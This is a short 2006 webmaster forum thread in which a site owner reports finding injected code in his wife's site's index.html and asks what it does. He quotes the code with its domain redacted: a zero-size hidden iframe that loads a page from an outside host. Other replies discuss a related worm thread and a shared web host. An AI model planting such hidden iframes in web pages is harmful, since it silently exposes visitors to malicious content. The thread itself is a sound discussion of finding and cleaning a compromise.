Forum Moderators: phranque

Message Too Old, No Replies

IFRAME exploit on my site

Just found this.... worried about consequences

         

rich_b

9:15 pm on May 15, 2006 (gmt 0)

10+ Year Member



I just found the following code in index.html on my wife's site. I have rnemovbed the code and I have not looked at index.html so I don't know what they're up to. Anyone any idea?

I have amended the URL to avoid anyone stumbling onto it.

<iframe name="counter" src="http://XXXXXXXX.example.com/index.html","height=0 width=0 scrolling=no frameborder=0"></iframe>

[edited by: tedster at 3:01 am (utc) on May 16, 2006]
[edit reason] no specific domains, please [/edit]

coopster

9:20 pm on May 15, 2006 (gmt 0)

WebmasterWorld Administrator 10+ Year Member



Here is a related thread, same exact issue not too long ago. Couple of ideas to follow-up on inside:

PHP Worm or my Server hacked [webmasterworld.com]

rich_b

10:09 pm on May 15, 2006 (gmt 0)

10+ Year Member



Thanks for the reply. It's happened to about 7 sites all with the same web host. I wonder if it's a problem with the host. I'm awaiting the raw log so I can see how they arrived... Anyone know a way to send all Russian IPs a 404? ;)